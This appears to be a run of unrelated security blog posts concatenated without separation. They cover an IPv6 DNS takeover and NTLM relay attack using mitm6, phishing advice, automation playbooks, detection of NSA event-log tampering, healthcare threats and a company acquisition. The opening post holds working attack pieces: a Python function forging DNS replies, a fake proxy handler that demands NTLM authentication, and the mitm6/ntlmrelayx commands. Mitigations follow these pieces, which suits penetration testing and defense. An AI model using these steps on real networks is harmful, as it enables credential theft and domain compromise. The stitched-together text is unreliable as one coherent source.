Similar to the slow IPv6 adoption, resources about abusing IPv6 are much less prevalent than those describing IPv4 pentesting techniques. While every book and course mentions things such as ARP spoofing, IPv6 is rarely touched on, and the tools available to test or abuse IPv6 configurations are limited. The THC IPV6 Attack toolkit is one of the available tools, and was an inspiration for mitm6. The attack described in this blog is a partial version of the SLAAC attack, which was first described in 2011 by Alex Waters from the Infosec institute. The SLAAC attack sets up various services to man-in-the-middle all traffic in the network by setting up a rogue IPv6 router. The setup of this attack was later automated with a tool by Neohapsis called suddensix.

The downside of the SLAAC attack is that it attempts to create an IPv6 overlay network over the existing IPv4 network for all devices present. This is hardly a desired situation in a penetration test since it rapidly destabilizes the network. Additionally, the attack requires quite a few external packages and services to work. mitm6 is a tool which focuses on an easy-to-set-up solution that selectively attacks hosts and spoofs DNS replies, while minimizing the impact on the network's regular operation. The result is a Python script which requires almost no configuration to set up, and gets the attack running in seconds. When the attack is stopped, the network reverts to its previous state within minutes thanks to the tweaked timeouts set in the tool.

The mitm6 attack

Attack phase 1 – Primary DNS takeover

mitm6 starts by listening on the primary interface of the attacker machine for Windows clients requesting an IPv6 configuration via DHCPv6. By default, every Windows machine since Windows Vista will request this configuration regularly. This can be seen in a packet capture from Wireshark:


mitm6 will reply to those DHCPv6 requests, assigning the victim an IPv6 address within the link-local range. While in an actual IPv6 network these addresses are auto-assigned by the hosts themselves and do not need to be configured by a DHCP server, this gives us the opportunity to set the attacker's IP as the default IPv6 DNS server for the victims. It should be noted that mitm6 currently only targets Windows-based operating systems, since other operating systems like macOS and Linux do not use DHCPv6 for DNS server assignment.

mitm6 does not advertise itself as a gateway, and thus hosts will not actually attempt to communicate with IPv6 hosts outside their local network segment or VLAN. This limits the impact on the network as mitm6 does not attempt to man-in-the-middle all traffic in the network, but instead selectively spoofs hosts (the domain which is filtered on can be specified when running mitm6).

The screenshot below shows mitm6 in action. The tool automatically detects the IP configuration of the attacker machine and replies to DHCPv6 requests sent by clients in the network with a DHCPv6 reply containing the attacker's IP as DNS server. Optionally, it will periodically send Router Advertisement (RA) messages to alert clients that there is an IPv6 network in place and that they should request an IPv6 address via DHCPv6. This will in some cases speed up the attack but is not required for the attack to work, making it possible to execute this attack on networks that have protection against the SLAAC attack with features such as RA Guard.


Attack phase 2 – DNS spoofing

On the victim machine we see that our server is configured as the DNS server. Due to Windows' preference regarding IP protocols, the IPv6 DNS server will be preferred over the IPv4 DNS server. The IPv6 DNS server will be used to query for both A (IPv4) and AAAA (IPv6) records.
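To make the spoofing step concrete, here is a minimal sketch (not mitm6's actual code) of how a malicious DNS server can answer an A query with an attacker-controlled address. It assumes a single-question A-record query and performs none of the validation, AAAA handling, or domain filtering that mitm6 does:

```python
import socket
import struct

def build_spoofed_response(query, spoof_ip):
    """Answer a single-question DNS A query with an attacker-chosen address."""
    txid = query[:2]                            # echo the transaction ID
    flags = struct.pack(">H", 0x8180)           # response, recursion available, NOERROR
    counts = struct.pack(">HHHH", 1, 1, 0, 0)   # 1 question, 1 answer, 0 authority/additional
    question = query[12:]                       # copy the question section verbatim
    answer = (
        b"\xc0\x0c"                             # compression pointer back to the queried name
        + struct.pack(">HHIH", 1, 1, 60, 4)     # TYPE=A, CLASS=IN, TTL=60s, RDLENGTH=4
        + socket.inet_aton(spoof_ip)            # the attacker-controlled address
    )
    return txid + flags + counts + question + answer
```

In the real attack, this answer is simply sent back over UDP to whichever victim asked, so any internal name the attacker chooses resolves to the attacker's machine.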


Now our next step is to get clients to connect to the attacker machine instead of the legitimate servers. Our end goal is to get the user or browser to automatically authenticate to the attacker machine, which is why we are spoofing URLs in the internal domain testsegment.local. In the screenshot in step 1, you can see that the client started requesting information about wpad.testsegment.local immediately after it was assigned an IPv6 address. This is the part we will be exploiting during this attack.

Exploiting WPAD

A (short) history of WPAD abuse

The Windows Proxy Auto Detection feature has been a much-debated one, and one that has been abused by penetration testers for years. Its legitimate use is to automatically detect a network proxy used for connecting to the internet in corporate environments. Historically, the address of the server providing the wpad.dat file (which provides this information) would be resolved using DNS, and if no entry was returned, the address would be resolved via insecure broadcast protocols such as Link-Local Multicast Name Resolution (LLMNR). An attacker could reply to these broadcast name resolution protocols, pretend the WPAD file was located on the attacker's server, and then prompt for authentication to access the WPAD file. This authentication was provided by default by Windows without requiring user interaction. This could provide the attacker with NTLM credentials for the user logged in on that computer, which could be used to authenticate to services in a process called NTLM relaying.

In 2016 however, Microsoft published a security bulletin MS16-077, which mitigated this attack by adding two important protections:
– The location of the WPAD file is no longer requested via broadcast protocols, but only via DNS.
– Authentication does not occur automatically anymore even if this is requested by the server.

While it is common to encounter machines in networks that are not fully patched and are still displaying the old behaviour of requesting WPAD via LLMNR and automatically authenticating, we come across more and more companies where exploiting WPAD the old-fashioned way does not work anymore.

Exploiting WPAD post MS16-077

The first protection, where WPAD is only requested via DNS, can be easily bypassed with mitm6. As soon as the victim machine has set the attacker as IPv6 DNS server, it will start querying for the WPAD configuration of the network. Since these DNS queries are sent to the attacker, it can just reply with its own IP address (either IPv4 or IPv6 depending on what the victim’s machine asks for). This also works if the organization is already using a WPAD file (though in this case it will break any connections from reaching the internet).

To bypass the second protection, where credentials are no longer provided by default, we need to do a little more work. When the victim requests a WPAD file, we won't request authentication, but instead provide it with a valid WPAD file in which the attacker's machine is set as a proxy. When the victim now runs any application that uses the Windows API to connect to the internet, or simply starts browsing the web, it will use the attacker's machine as a proxy. This works in Edge, Internet Explorer, Firefox and Chrome, since they all respect the WPAD system settings by default.
Now when the victim connects to our "proxy" server, which we can identify by the use of the CONNECT HTTP verb or the presence of a full URI after the GET verb, we reply with an HTTP 407 Proxy Authentication Required. This is different from the HTTP code normally used to request authentication, HTTP 401.
IE/Edge and Chrome (which uses IE's settings) will automatically authenticate to the proxy, even on the latest Windows versions. In Firefox this setting can be configured, but it is enabled by default.
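As a minimal illustration of this step (not ntlmrelayx's implementation; the class and method names are mine), a Python standard-library handler that answers every proxied request with a 407 looks like this:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

class FakeProxyHandler(BaseHTTPRequestHandler):
    """Demand proxy authentication for every request that reaches us."""

    def _demand_auth(self):
        # 407, not 401: browsers will auto-authenticate to a *proxy* with the
        # logged-in user's NTLM credentials, even on patched Windows.
        self.send_response(407)
        self.send_header("Proxy-Authenticate", "NTLM")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_GET(self):
        self._demand_auth()

    do_CONNECT = do_GET  # proxied HTTPS requests arrive as CONNECT
```

ntlmrelayx goes further: instead of discarding the NTLM response it receives, it relays that authentication to another service in the network.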


Windows will now happily send the NTLM challenge/response to the attacker, who can relay it to different services. With this relaying attack, the attacker can authenticate as the victim on services, access information on websites and shares, and if the victim has enough privileges, the attacker can even execute code on computers or even take over the entire Windows Domain. Some of the possibilities of NTLM relaying were explained in one of our previous blogs, which can be found here.

The full attack

The previous sections described the general idea behind the attack. Running the attack itself is quite straightforward. First we start mitm6, which will begin replying to DHCPv6 requests and, afterwards, to DNS queries requesting names in the internal network. For the second part of our attack, we use our favorite relaying tool, ntlmrelayx. This tool is part of the impacket Python library by Core Security and is an improvement on the well-known smbrelayx tool, supporting several protocols to relay to. Core Security and Fox-IT recently worked together on improving ntlmrelayx, adding several new features which (among others) enable it to relay via IPv6, serve the WPAD file, automatically detect proxy requests and prompt the victim for the correct authentication. If you want to check out some of the new features, have a look at the relay-experimental branch.

To serve the WPAD file, all we need to add to the command line is the -wh parameter, specifying the host that the WPAD file resides on. Since mitm6 gives us control over the DNS, any non-existent hostname in the victim network will do. To make sure ntlmrelayx listens on both IPv4 and IPv6, use the -6 parameter. The screenshots below show both tools in action: mitm6 selectively spoofing DNS replies, and ntlmrelayx serving the WPAD file and then relaying authentication to other servers in the network.
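Putting the two phases together, a typical invocation looks something like the following. The domain and the -wh hostname are examples (any name that does not exist in the victim network's DNS will do), and the relay target is a placeholder:

```shell
# Terminal 1: reply to DHCPv6 requests and spoof DNS for the internal domain
mitm6 -d testsegment.local

# Terminal 2: serve the WPAD file, listen on IPv4 and IPv6 (-6),
# and relay captured authentication to a target server (-t)
ntlmrelayx.py -6 -wh attacker-wpad.testsegment.local -t smb://<target>
```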


Defenses and mitigations

The only defense against this attack that we are currently aware of is disabling IPv6 if it is not used on your internal network. This will stop Windows clients from querying for a DHCPv6 server and make it impossible to take over the DNS server with the method described above.
For the WPAD exploit, the best solution is to disable Proxy Auto Detection via Group Policy. If your company uses a proxy auto-configuration (PAC) file internally, it is recommended to explicitly configure the PAC URL instead of relying on WPAD to detect it automatically.
While this blog was being written, Google Project Zero also discovered vulnerabilities in WPAD; their blog post mentions that disabling the WinHttpAutoProxySvc service is, in their experience, the only reliable way to disable WPAD.

Lastly, the only complete solution to prevent NTLM relaying is to disable it entirely and switch to Kerberos. If this is not possible, our last blog post on NTLM relaying mentions several mitigations to minimize the risk of relaying attacks.


The Fox-IT Security Research Team has released Snort and Suricata signatures to detect rogue DHCPv6 traffic and WPAD replies over IPv6:

Where to get the tools

mitm6 is available from the Fox-IT GitHub. The updated version of ntlmrelayx is available from the impacket repository.

Please Do Not Feed the Phish

How to Avoid Phishing Attacks

We've all heard the phishing attack stories that start with someone receiving an email that requests an urgent invoice review or password change, and ends with a data breach where personal information is compromised and money is lost. Although many of us may roll our eyes at the possibility of falling for such an obvious scam, we must acknowledge that if those tricks didn't work, malicious actors wouldn't keep trying. Sometimes, previously established filters and phishing mailboxes aren't enough. Vulnerabilities can still exist. At times, the content of an email can be troublesome. If a message asking for a money-wire transfer comes through looking urgent and legitimate enough, an unsuspecting employee might just take a requested action out of fear of repercussion. If an attachment looks innocent or a link seems harmless, it's inevitable that someone might succumb. PhishMe reports that over 90 percent of data breaches can be traced back to phishing emails (PhishMe, 2017).

Phishing is often the initial step of a larger attack. Advanced persistent threat (APT) activity often leverages phishing emails as an initial intrusion method. Phishing provides actors with the ability to target specific individuals or organizations unlike other methods such as strategic web compromises. Even as organizations put their defenses up against these attackers, the tactics continue to advance.

Another common tactic is to spoof URLs so they appear similar to those of a legitimate organization. This makes a link look trustworthy at first glance. For example, a full URL might begin with the name of a trusted organization, but unless the recipient looked closely and noticed that the registered domain was actually badguys[.]com, they might be fooled. Another domain spoofing technique involves registering domains with missing characters or subtle spelling errors, such as www.threatcomect[.]com, which replaces two "n" characters with one "m" character. At a glance, the domain looks like it might be the legitimate ThreatConnect website, but upon closer examination it is clear that the characters aren't quite right. This is a technique commonly used by many APTs, including Fancy Bear, Deep Panda, and APT10.
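Defenders can hunt for these look-alike domains programmatically. The sketch below uses plain edit distance to flag near-misses of a legitimate domain; the function names and the threshold of 2 are arbitrary illustration choices, not a product feature:

```python
def levenshtein(a, b):
    """Edit distance between two strings (insertions, deletions, substitutions)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution
        prev = cur
    return prev[-1]

def looks_like_spoof(candidate, legit, threshold=2):
    """Flag a domain suspiciously close to (but not equal to) a legitimate one."""
    return candidate != legit and levenshtein(candidate, legit) <= threshold
```

Running newly registered domain feeds against your organization's domains with a check like this is a cheap early-warning signal for typosquatting.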

Our ThreatConnect Research Team identified that Fancy Bear was most likely the threat actor responsible for the World Anti-Doping Agency (WADA) phishing incident, which used this spoofing technique as well. Fancy Bear used domains such as wada-arna[.]org, a slight misspelling of WADA's legitimate wada-ama[.]org. The phishing emails linking to these domains were likely used in an attempt to harvest recipients' credentials. By leveraging ThreatConnect and DomainTools, our team was able to identify an additional domain registered by the same individuals -- tas-cass[.]org -- that spoofs a domain for the Court of Arbitration for Sport, which works closely with WADA. Taking a deeper look into spoofing and watching for domains that spoof your organization can help your team prevent and mitigate similar incidents in the future.

When it comes to phishing, early detection and speedy incident response are imperative to prevent data breaches. Early detection helps you establish filters so the offending email can't reach its intended recipients, while phishing mailboxes let you ingest the email into ThreatConnect for knowledge management, investigative, and research efforts. By proactively establishing these security measures, security teams can deter or monitor threats that use these techniques.

However, email filters and phishing mailboxes aren't foolproof, and if malicious emails get through those defenses, recipients may have their guard down. Attackers are experts at creating phishing pages. In researching Fancy Bear activity targeting the DNC and the citizen journalism organization Bellingcat, ThreatConnect researchers identified the use of Google-spoofing phishing emails and credential harvesting pages. Incidents where the malicious actor attempts to harvest target credentials underscore the importance of multi-factor authentication (MFA). In the worst-case scenario, where a credential harvesting campaign successfully compromises an individual's credentials, MFA limits the malicious actor's ability to log in to the affected account.

It isn't just large organizations that attackers go after. Small and medium-sized companies aren't safe just because of a smaller revenue stream. Since phishing attacks are relatively easy to launch, it's recommended that even the smallest teams be on the lookout for suspicious emails. When it comes to prevention and mitigation, one of the strongest defenses any organization can enable is automation. Establish a system that can evaluate and flag potential threats as they come in, and your security team will have the time to craft an effective response to the most pertinent threats.

Phishing attacks could be considered a "classic" example of cybercrime as we approach an era where we're inundated with online danger. Although there is no one-size-fits-all solution to preventing and mitigating phishing, security teams can save themselves time and stress by leveraging threat intelligence and establishing stronger filters. Teach your team to check URLs by hovering over them before clicking, and to check with management before opening suspicious attachments. Spending that extra minute looking over any email you're just not sure about, and training employees to know what to look for when scrutinizing messages, could save your company a lot of time, energy, and money.

The post Please Do Not Feed the Phish appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Playbook Fridays: Task Management

Simulate a task in ThreatConnect which can be modified to recur daily, weekly, or monthly

ThreatConnect developed the Playbooks capability to help analysts automate time-consuming and repetitive tasks so they can focus on what is most important. In many cases, Playbooks also ensure the analysis process occurs consistently and in real time, without human intervention.

As an analyst, you may have many recurring tasks that need to be finished on a weekly or monthly basis, and you may want all of your research and analysis tasks in one place (ThreatConnect). With this Playbook, you can simulate a recurring task in ThreatConnect using a timer trigger that can be modified to create a task daily, weekly, or monthly.

The Playbook creates a task with the given name and a due date two days from the date on which the task is created.


After installing the playbook, change the "Run Weekly" app to run on the desired interval and at the desired time. Next, edit the "Set Variables" app. The "taskName" variable is used to set the name of the task as it will appear in ThreatConnect. The "dueDateOffset" variable is used to specify the amount of time between the date a new task is created and when it is due. Lastly, edit the "Create ThreatConnect Task" app and set the assignees, escalatees, and any other details about the recurring task which will be created.
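The due-date arithmetic driven by the "dueDateOffset" variable can be sketched in plain Python. This is an illustration of the logic only, not the Playbooks implementation, and the function name is ours:

```python
from datetime import datetime, timedelta

def task_due_date(created: datetime, due_date_offset_days: int = 2) -> str:
    """Due date N days after creation, formatted as an ISO 8601 UTC string."""
    due = created + timedelta(days=due_date_offset_days)
    return due.strftime("%Y-%m-%dT%H:%M:%SZ")

print(task_due_date(datetime(2018, 4, 16, 9, 0, 0)))  # -> 2018-04-18T09:00:00Z
```

The offset rolls over month and year boundaries correctly, which is why a date library beats manual day arithmetic here.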

Website Content Playbook

We've designed another Playbook, also run weekly, that requests a website's content, hashes it, retrieves the previous hash from the playbook's datastore, and compares the two. If the hash of the current content differs from the hash of the previous content, an alert is sent.

Warning: Do not use this playbook to request the content of a malicious website. It should only be used to monitor the content of infrastructure which belongs to you.


After installing the playbook:

  1. Edit the "Run Playbook Weekly" app to specify how often and when you would like the app to run.
  2. Edit the "Set Variables" app and set the website you would like to monitor and the Slack channel to which you would like to send notifications (and feel free to change the user agent too).
  3. Find all of the apps which have errors and fill in the missing fields (these include parameters like the ThreatConnect owner and Slack API token).
  4. Turn it on and run the playbook!

Periodically capture the content of a website and send an alert if the content changes.
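The hash-and-compare loop at the heart of this Playbook can be approximated with standard-library Python. In this sketch the state file stands in for the playbook's datastore and a print stands in for the Slack notification:

```python
import hashlib
import json
import urllib.request
from pathlib import Path

STATE = Path("site_hash.json")  # stands in for the playbook's datastore

def content_hash(body: bytes) -> str:
    """SHA-256 of the raw page content."""
    return hashlib.sha256(body).hexdigest()

def check_site(url: str, user_agent: str = "site-monitor/1.0") -> bool:
    """Fetch the page, compare its hash to the stored one, and alert on change."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    body = urllib.request.urlopen(req, timeout=30).read()
    new = content_hash(body)
    old = json.loads(STATE.read_text()).get(url) if STATE.exists() else None
    STATE.write_text(json.dumps({url: new}))  # remember the latest hash
    if old is not None and old != new:
        print(f"ALERT: content of {url} changed")  # a Slack notification goes here
        return True
    return False
```

As with the Playbook itself, only point this at infrastructure you own; the first run just records a baseline hash.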






The post Playbook Fridays: Task Management appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Detection and recovery of NSA’s covered up tracks

Part of the NSA cyber weapon framework DanderSpritz is eventlogedit, a piece of software capable of removing individual lines from Windows Event Log files. Now that this tool has been leaked and made public, any criminal who wants to remove their traces on a hacked computer can use it. Fox-IT has looked at the software and found a unique way to detect its use and to recover the removed event log entries.


A group known as The Shadow Brokers published a collection of software which allegedly was part of the cyber weapon arsenal of the NSA. The published software included the exploitation framework FuzzBunch and the post-exploitation framework DanderSpritz. DanderSpritz is a full-blown command and control server, or listening post in NSA terms. It can be used to stealthily perform various actions on hacked computers, like finding and exfiltrating data or moving laterally through the target network. Its GUI is built in Java, and it contains plugins written in Python that provide the functionality to perform specific actions on the target machine. One specific plugin in DanderSpritz caught the eye of the Forensics & Incident Response team at Fox-IT: eventlogedit.

DanderSpritz with eventlogedit in action

Figure 1: DanderSpritz with eventlogedit in action


Normally, the content of Windows Event Log files is useful for system administrators troubleshooting system performance, security teams monitoring for incidents, and forensic and incident response teams investigating a breach or fraud case. A single event record can alert the security team or be the smoking gun during an investigation. Various other artefacts found on the target system usually corroborate findings in Windows Event Log files during an investigation, but a missing event record could reduce the chances of detection of an attack, or impede investigation.

Fox-IT has encountered event log editing by attackers before, but eventlogedit appeared to be more sophisticated. Investigative methods that can spot other forms of event log manipulation showed no indicators of edited log files after the use of eventlogedit. Using eventlogedit, an attacker is able to remove individual event log entries from the Security, Application, and System logs on a target Windows system. After forensic analysis of systems where eventlogedit was used, the Forensics & Incident Response team of Fox-IT was able to create a Python script that detects the use of eventlogedit and fully recovers the event log entries removed by the attacker.

Analysing recovered event records, deleted by an attacker, gives great insight into what an attacker wanted to hide and ultimately wanted to achieve. This provides security and response teams with more prevention and detection possibilities, and investigative leads during an investigation.

Before (back) and after (front) eventlogedit

Figure 2: Before (back) and after (front) eventlogedit

eventlogedit in use

Starting with Windows Vista, Windows Event Log files are stored in the Windows XML Eventlog format. The files on the disk have the file extension .evtx and are stored in the folder \Windows\System32\winevt\Logs\ on the system disk, by default. The file structure consists of a file header followed by one or more chunks. A chunk itself starts with a header followed by one or more individual event records. The event record starts with a signature, followed by record size, record number, timestamp, the actual event message, and the record size once again. The event message is encoded in a proprietary binary XML format, binXml. BinXml is a token representation of text XML.
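The record layout described above can be read with a few lines of Python. The following is a simplified sketch of parsing a single record header (field widths follow the commonly documented evtx format; chunk headers and binXml parsing are ignored):

```python
import struct
from collections import namedtuple

RECORD_MAGIC = b"\x2a\x2a\x00\x00"  # start-of-record signature
Record = namedtuple("Record", "size record_id filetime size_copy")

def parse_record(buf: bytes, offset: int = 0) -> Record:
    """Parse one event-record header plus the trailing size copy.

    Layout (as described above): 4-byte signature, uint32 record size,
    uint64 record number, uint64 FILETIME timestamp, binXml message,
    and the uint32 size repeated at the very end of the record.
    """
    if buf[offset:offset + 4] != RECORD_MAGIC:
        raise ValueError("not an event record")
    size, record_id, filetime = struct.unpack_from("<IQQ", buf, offset + 4)
    (size_copy,) = struct.unpack_from("<I", buf, offset + size - 4)
    return Record(size, record_id, filetime, size_copy)
```

In an intact file, `size` and `size_copy` agree and the next record begins exactly `size` bytes later.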

Fox-IT discovered that when eventlogedit is used, the to-be-removed event record itself isn't edited or removed at all: the record is only unreferenced. This is achieved by manipulating the record header of the preceding record. Eventlogedit adds the size of the to-be-removed record to the size of the previous record, thereby merging the two records. The removed record, including its record header, is now simply seen as excess data of the preceding record. This is illustrated in Figure 3. You might think that an event viewer would show this excess or garbage data, but it does not: apparently, all tested viewers parse the record's binXml message data until the first end-tag and then move on to the next record. Tested viewers include Windows Event Viewer as well as various other forensic event log viewers and parsers. None of them was able to show a removed record.

Untouched event records (left) and deleted event record (right)

Figure 3: Untouched event records (left) and deleted event record (right). Note: not all fields are displayed here.

Merely changing the record size would not be enough to prevent detection: various fields in the file and chunk headers need to be changed as well. Eventlogedit makes sure that all following event records are renumbered and that checksums are recalculated in both the file and chunk header. In doing so, it prevents obvious anomalies like missing record numbers or checksum errors from raising an alarm with the system user or the security department.

Organizations which send event log records on the fly to a central log server (e.g. a SIEM), should be able to see the removed record on their server. However, an advanced attacker will most likely compromise the log server before continuing the operation on the target computer.

Recovering removed records

As eventlogedit leaves the removed record and record header in its original state, their content can be recovered. This allows the full recovery of all the data that was originally in the record, including record number, event id, timestamps, and event message.
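Because the hidden record and its header survive byte-for-byte, recovery can be as simple as scanning a record's declared extent for a second record signature. The sketch below is our illustration of the idea, not Fox-IT's actual script:

```python
import struct

RECORD_MAGIC = b"\x2a\x2a\x00\x00"  # start-of-record signature

def find_hidden_records(record_body: bytes):
    """Scan one (possibly oversized) record for embedded record headers.

    eventlogedit leaves the removed record intact inside the previous
    record's declared size, so a record signature found after offset 0
    marks a recoverable, unreferenced record.
    """
    hidden = []
    pos = record_body.find(RECORD_MAGIC, 4)  # skip the record's own header
    while pos != -1:
        if pos + 24 > len(record_body):      # truncated header, stop scanning
            break
        size, record_id, filetime = struct.unpack_from("<IQQ", record_body, pos + 4)
        hidden.append({"offset": pos, "size": size,
                       "record_id": record_id, "filetime": filetime})
        pos = record_body.find(RECORD_MAGIC, pos + 4)
    return hidden
```

From the recovered header, the record number, timestamp, and binXml message can all be extracted, which is exactly the data the attacker tried to hide.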

Fox-IT’s Forensics & Incident Response department has created a Python script that finds and exports any removed event log records from an event log file. This script also works in the scenario when consecutive event records have been removed, when the first record of the file is removed, or the first record of a chunk is removed. In Figure 4 an example is shown.

Recovering removed event records

Figure 4: Recovering removed event records

We have decided to open source the script. It can be found on our GitHub and works like this:

$ python -h
usage: [-h] -i INPUT_PATH [-o OUTPUT_PATH] [-e EXPORT_PATH]

Parse evtx files and detect the use of the danderspritz module that
deletes evtx entries

optional arguments:
 -h, --help      show this help message and exit
 -i INPUT_PATH   Path to evtx file
 -o OUTPUT_PATH  Path to corrected evtx file
 -e EXPORT_PATH  Path to location to store exported xml records

The script requires the python-evtx library from Willi Ballenthin.

Additionally, we have created an easy to use standalone executable for Windows systems which can be found on our GitHub as well.


md5    c07f6a5b27e6db7b43a84c724a2f61be 
sha1   6d10d80cb8643d780d0f1fa84891a2447f34627c
sha256 6c0f3cd832871ba4eb0ac93e241811fd982f1804d8009d1e50af948858d75f6b



To detect whether the NSA or someone else has used the eventlogedit tool to cover up their tracks on your systems, it is recommended to run the script on event log files from your Windows servers and computers. As the NSA very likely changed their tools after the leaks, it might be far-fetched to expect to detect their current operations with this script, but you might find traces of it in older event log files. It is therefore recommended to also run the script on archived event log files from back-ups or central log servers.

If you find traces of eventlogedit and would like assistance in analyzing and remediating a possible breach, feel free to contact us: our Forensics & Incident Response department is available during business hours, and FoxCERT is available 24/7.

Wouter Jansen
Fox-IT Forensics & Incident Response

ThreatConnect Provides a Report on Healthcare and Medical Industry Threats

Learn about the threats and how to protect your healthcare organization


Medical and health organizations, which include organizations operating in the pharmaceutical sector, face a variety of threats that are inherent to the services they provide and the data they safeguard. Within medical and health verticals, the risks associated with compromise are often significantly heightened because patient care and personal information are at stake. This report highlights notable threats to those organizations and corresponding intelligence within the ThreatConnect platform that may facilitate those organizations' defensive efforts.

Ransomware - This was the most notable malware threat for healthcare and medical organizations in 2016 after Hollywood Presbyterian paid $17,000 to an attacker who had successfully debilitated its services using Locky. Ransomware use continued throughout 2016 and 2017, with many attacks coming against other medical/health organizations. These organizations are viable targets for ransomware attackers because there is significant pressure to re-enable medical services after they are taken offline. Several other ransomware variants appeared during 2016 and 2017, including SamSam, TeslaCrypt, NotPetya, and WannaCry.

Chinese Advanced Persistent Threats (APTs) - Deep Panda, a Chinese APT, has been associated with attacks against medical and health organizations. Notably this includes the 2015 Anthem BCBS breaches as well as 2015 attacks against the pharmaceutical sector. Deep Panda's interest in healthcare organizations likely stems from a motivation to garner intelligence on US government individuals (Anthem BCBS provides insurance to a majority of federal employees participating in the Federal Employee Health Benefits program). Deep Panda's interest in pharmaceutical and medical device organizations likely is the result of a goal to collect intelligence on intellectual property to enable domestic production. Other Chinese APTs that have been associated with attacks on the healthcare vertical include Wekby (Dynamite Panda) and Suckfly. Identified and openly reported Chinese APT activity targeting US organizations has decreased since the 2015 Rose Garden agreement on cybertheft between the US and China; however, recent Chinese operations overseas have been identified and knowledge of these groups and previous operations may facilitate future defensive efforts.


Generally, medical and health organizations have the following considerations and data holdings that they must incorporate into their risk assessments, defensive strategies, and intelligence requirements:

  1. Personally identifiable information (PII) and personal medical information (PMI)
  2. Intellectual property (IP), notably in pharmaceutical and biomedical industries
  3. Continuity of operations
  4. Medical devices

Example Intelligence Requirements

Intelligence requirements define topics on which organizations should focus intelligence collection, processing, analysis, and production. Intelligence requirements can be used to drive both strategic and tactical defense efforts, efficiently drive procurement, and identify gaps in intelligence collection. ThreatConnect provides the following general intelligence requirements for organizations in the medical and health sector to enable organizations' intelligence-related discussions and focus research efforts:

  • Which threats -- including nation state, criminal, and hacktivist groups, specific adversaries, or malware -- target our organization?
  • What types of notable attacks has our organization experienced before?
  • Which advanced persistent threats (APTs) have specifically targeted organizations within the medical and health sectors?
    • How do these APTs typically conduct operations against their targets?
    • What specific tactics do these APTs employ prior to conducting operations against their targets?
    • What are these APTs' motivations with respect to their operations against medical and health organizations?
  • What types or variants of malware have been used to steal, delete, or ransom PII, PMI, or IP specific to medical and health verticals?
    • What ransomware has been used in attacks against the medical and health verticals?
      • How does this ransomware work and how does it ransom the targeted data?
  • What vulnerabilities have been identified in software commonly used at our organization or that would enable access to pertinent data holdings?
  • What vulnerabilities have been identified in medical devices that we develop or employ?


In The Platform

Below, we identify notable Threats, Incidents/Campaigns, Tags, and Communities within the ThreatConnect platform that are pertinent to medical and health organizations. The links and information provided below are from our Common Community; however, our ThreatConnect Intelligence source has more significant, enriched, and timely information on these threats and others pertinent to the medical and health sectors.


Threats capture both nation state and criminal threat groups, as well as malware groups that have been used in multiple operations.

Deep Panda / Black Vine - Chinese APT Associated with the 2015 Anthem/BCBS breaches and attempts against pharmaceutical companies

APT10 / Stone Panda / menuPass - Chinese APT associated with 2016-2017 activity targeting European and Japanese organizations in a variety of sectors, including the pharmaceutical industry.



ThreatConnect entry for APT10 / Stone Panda / menuPass.


Suckfly - Chinese APT that has primarily targeted organizations in India, including a US healthcare provider's business unit
Locky - Ransomware variant, initially identified in February 2016, that has been leveraged in successful attacks, notably against hospitals and the healthcare sector.



ThreatConnect entry for Locky


SamSam - This ransomware family seems to be distributed by compromising servers and using them as a foothold to move laterally through the network, compromising additional machines which are then held for ransom.

Nymaim - Nymaim is a two-stage malware dropper. It usually infiltrates computers through exploit kits and then executes the second stage of its payload once it is on the machine, effectively using two executables for the infection routine.


Incidents capture individual attacks emanating from a given group or using specific malware. Incidents may also be used to capture research efforts into a group or malware. Campaigns generally are a collection of multiple incidents that are associated with a group or malware.

20170824E: Locky Diablo6

20170627B: PetrWrap / Petya / NotPetya Indicators

20170512C: Wanna Decryptor

20170407B: PwC Report on Operation Cloud Hopper


Tags are commonly used within the ThreatConnect platform to specify targeted sectors, types of malware or tactics used, or attributed threats for identified activity or groups. ThreatConnect users can also follow tags to be alerted to new activity that is pertinent to their interests.


The following communities and sources may be pertinent for organizations looking for intelligence on activity targeting medical and health verticals. These communities also facilitate the sharing of intelligence with other members that have similar intelligence requirements.

    • Medical and Health Community - Community for sharing incidents/intelligence with other members of the medical and health community.
    • ThreatConnect Intelligence - Incidents from ThreatConnect Research as well as profiles on significant threats to the Medical/Health sector.
    • Common Community - ThreatConnect's open community with wider access that houses intelligence on a variety of threats. 
    • Technical Blogs and Reports - This source automatically captures and tags intelligence shared in dozens of open source cybersecurity blogs and reports. This creates a one-stop shop for organizations to review recently identified intelligence.

Making Life Easier with Dashboards

With ThreatConnect's new Dashboard feature we can create populated tables and graphs for medical and health verticals based on the aforementioned relevant threats and tags. Below is a simple example showing a Dashboard with four tables capturing Groups and Indicators tagged with medical and health sectors and the threats that are pertinent to them. Dashboards like this one make it easy for organizations to quickly identify and triage intelligence that is relevant to their investigations or defensive efforts.




Given the speed at which previous attacks and compromises within the medical and health sector have escalated, coupled with the inherent need to ensure continuity of operations, staying apprised of pertinent threat intelligence is a must for those organizations. Further, once attacks or specific threats are identified, an organization can mature toward proactively identifying and defending against future attacks. The ThreatConnect platform assists organizations at any threat intelligence maturity level in quickly and efficiently identifying, researching, and defending against their most pertinent threats.

The post ThreatConnect Provides a Report on Healthcare and Medical Industry Threats appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Hybrid Analysis Grows Up – Acquired by CrowdStrike

CrowdStrike acquired Payload Security, the company behind the automated malware analysis sandbox technology Hybrid Analysis, in November 2017. Jan Miller founded Payload Security approximately 3 years earlier. The interview I conducted with Jan in early 2015 captured his mindset at the onset of the journey that led to this milestone. I briefly spoke with Jan again, a few days after the acquisition. He reflected upon his progress over the three years of leading Payload Security so far and his plans for Hybrid Analysis as part of CrowdStrike.

Jan, why did you and your team decide to join CrowdStrike?

Developing a malware analysis product requires a constant stream of improvements to the technology, not only to keep up with the pace of malware authors’ attempts to evade automated analysis but also innovate and embrace the community. The team has accomplished a lot thus far, but joining CrowdStrike gives us the ability to access a lot more resources and grow the team to rapidly improve Hybrid Analysis in the competitive space that we live in. We will have the ability to bring more people into the team and also enhance and grow the infrastructure and integrations behind the free Hybrid Analysis community platform.

